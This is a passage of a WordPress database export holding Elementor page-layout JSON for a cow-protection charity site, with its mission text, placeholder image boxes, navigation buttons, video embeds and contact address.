\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9281,1593,'_elementor_page_assets','a:0:{}'),(9283,1594,'_elementor_edit_mode','builder'),(9284,1594,'_elementor_template_type','wp-page'),(9285,1594,'_elementor_version','3.7.8'),(9286,1594,'_wp_page_template','elementor_canvas'),(9287,1594,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 